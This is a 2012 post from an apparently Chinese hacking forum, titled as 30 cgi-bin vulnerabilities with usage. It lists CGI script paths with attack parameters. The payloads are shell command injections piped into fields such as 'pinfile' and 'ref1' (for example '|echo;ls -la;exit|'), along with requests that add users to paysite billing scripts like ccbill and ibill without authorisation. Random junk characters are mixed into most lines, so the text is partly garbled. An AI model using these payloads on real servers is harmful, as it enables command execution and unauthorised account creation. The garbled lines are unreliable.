找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3013|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
* K: y4 z, B# @3 g5 |4 P4 Z
) J; l% X  n! Q2 @- k$ j9 v/smspass.pl9 {! [# J" A) p$ }; S4 g
username=username&password=password
% }% X4 D+ ?4 e( z1 k- i  g* P3 D" [' w5 e" S( v
/index.cgi, c' {2 R* i/ @! I0 ]8 L
wei=ren&gen=command4 L  @9 [3 N" B; @. w
- z6 a& ~2 [/ _2 w, u# {7 L( F
/passmaster.cgi4 Z+ o; q" x$ @" a( ]  g8 {# z; i
Action=Add&Username=Username&Password=Password
. r' _  o1 W3 }  R- C$ G+ s% M$ }9 u" M9 q; |  x
/accountcreate.cgi- @9 _) L; E: B9 O0 g  f
username=username&password=password&ref1=|echo;ls|
  ~% U/ Y/ d4 }  l  J
) o0 |1 B7 k4 {# X/form.cgi
8 z1 W0 {; S) X, e/ M" ]9 Mname=xxxx&email=email&subject=xxxx&response=|echo;ls|; a  q7 M( G& A( i5 Q, F$ P, A8 Y
& s, w) q& c- ]8 L1 Y0 ^% E% j
/addusr.pl4 s, F1 x5 g/ H* C6 \5 ^; M. w- L8 G
/cgi-bin/EuroDebit/addusr.pl
( Z+ x- I. S+ n' _* Z/ e, i8 t/ Kuser=username&pass=Password&confirm=Password
, P$ z8 O. j6 K$ G8 j4 M; y: d6 P9 s& c6 p5 R2 F7 _9 t9 u
/ccbill-local.asp0 B& e: v1 F( b5 o
post_values=username:password
, f* O" |% W% _" [$ T8 J. ?) D4 [) M/ g( G. C" s! Y* k8 f
/count.cgi
  [/ v( |7 p, m5 e1 S, [/ |& F! zpinfile=|echo;ls -la;exit|
& N. }8 n# ?  y
( |* G1 c& S- t4 A5 G- Q/recon.cgi
" h; ^$ C$ \3 i  ]0 M/recon.cgi?search
2 ]( G7 o' I/ `- U/ {" Msearchoption=1&searchfor=|echo;ls -al;exit|
, B/ K/ [/ _# J+ k& Q7 L1 M* W0 L% F. N: q+ z
/verotelrum.pl9 Z( o' X6 F) @# o/ @
vercode=username:password:dseegsow:add:amount<&30>
- i0 {( I/ S& O# H6 s3 \
# `0 C/ N3 O$ N' B0 q: @) ?/af.cgi
3 {( f/ |! X2 ?3 `3 Z8 B8 }_browser_out=|echo;ls -la;exit;|
  l3 A0 o1 L8 Y; L: i8 {' S9 r, T3 d5 Z% t1 G
/modify.cgi
; A+ ~% S3 V* eusername=username&password=password&expire=30  |1 F4 S) C- T7 T% E( W- u
) o& }1 `7 R4 U$ K3 M3 H2 j2 t
/openjournal.cgi$ d  f# ^6 l8 A- n! V
edit=1&ct=2&go=|echo;ls -al;exit|' L% L- F" S0 B' f. P
, W! t# T* c; J$ a2 j* ~# e
/gx9passwd.cgi" z* b1 `5 K( _; I4 ^5 Z
cmd=ADD&user=username&pass=password
  n9 Y0 T6 B& |3 ]2 \' t- u5 i' g' a) s3 {" \' @6 m: q3 m7 i
/probecontrol.cgi
7 @0 W, a& s4 W) P; q6 w; hcommand=enable&username=username&password=password
6 b* E. R) e+ J' q( f1 L4 W7 R5 G/ n9 Z: \- u4 y7 v. ]* x" }. J8 A
/recon.cgi1 E7 Z& x# q) t  r- y, }( T: I9 p
searchoption=3&searchfor=echo;ls -la;exit
+ f3 J7 d7 S. x8 {& C! {9 y) m
/htadd.pl
; M+ A) f& C% W4 z4 uconfigfile=|echo; ls -alt; exit: |+ M- T; g+ g

* Y8 a" p8 p4 b# L, C9 Y! `+ d/gx9passwd.cgi  Y9 v5 P0 s& _" O' r: g
cmd=ADD&user=username&pass=password6 Z  Y; _! l7 A& M3 y7 t
/ X/ t. P' S( ^) r4 c; c
/ibill*.pl
, h7 c! Q, N9 K0 m: w$ Kreqtype=add&authpwd=authpwd&username=username&password=password
  n- h' o6 \7 G9 [% o2 T
: Q8 J% E# ?# k/cpay.cgi! l0 Z' Z  Z/ w" d* D% \6 l( l# l
command=add_member&username=username(EMAIL)&password=password(DES)8 x+ e. c2 k/ m6 N, Y
4 w7 t9 R  y* ^
/globill_ut.cgi
" M6 u5 P% w8 ]: [+ \do=add&username=username&password=password&wpassword=password) w; J& ^6 d# {2 ]  t3 s
" e( ]( }( t1 M! G7 A
/usercontrol.cgi. r9 i$ Z6 ]! `5 x& M0 \1 {/ G
command=enable&username=USER&password=PASS! y. b0 Q% `- w! p  J" Z" [1 O
- |' `: k4 A2 s0 Z
/globoSALErum.cgi( l: i2 P+ e/ i7 r, i$ Q
action=ADD&seccode=seccode&login=username&password=password
( I' {5 W. b& g7 d) o7 t. [: G8 Q" n9 @
/addusr.pl- N* \2 O, C. h. Q
user=USER&pass=PASS&confirm=PASS' v2 [$ [' J4 U

/ @6 D" @7 H4 z/pincount.cgi% Z, i+ V: ~. a5 g2 U3 N
/cgi-bin/mastergate/pincount.cgi
& E/ a* ?. `" Z# w* [9 Rpinfile=|echo;pwd;exit|7 ~2 J$ V9 q  e0 p
% d. O; x. P# G; h
/accountcreate.cgi
1 h" u% ]  W0 i7 O/cgi-bin/gateway/accountcreate.cgi
1 N) p/ ^9 o7 dusername=username&password=password&password2=password&ref1=|echo;ls -al;exit5 z) f1 I" Q+ `- [& l
7 b9 D8 K( w0 t1 n; b
/af.cgi
, H( i) ^0 H8 f& b/env.cgi
1 Y& Q$ B6 L% y1 pADD+;echo;pwd;exit" x. \0 v# Y4 n. z
! T4 J$ f8 a4 X+ y9 |0 B& o3 A8 K
/count.cgi
6 X9 L$ S9 W$ P& k+ zpinfile=|echo;pwd;exit|; A4 x; ]. P2 `7 h2 C8 n

/ ~" I6 z; `4 j/ a& g3 w; ?/recon.cgi
- I/ D! I& a8 [) H" j8 t: lsearchoption=1&searchfor=|echo;ls%20-al;exit|
  {0 c* r% k4 v+ {7 e" M
3 b' Q* i, x3 z+ t1 I. A: j/add.cgi' W8 D) |! Z' ^0 O0 X, L. z$ M2 d/ U
username=username&password=password&expire=30- q: g6 H" I6 n( G0 y, O

% P3 p$ B. B  i5 _, o( h6 m2 }==============================
/ G7 G% L/ `9 u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表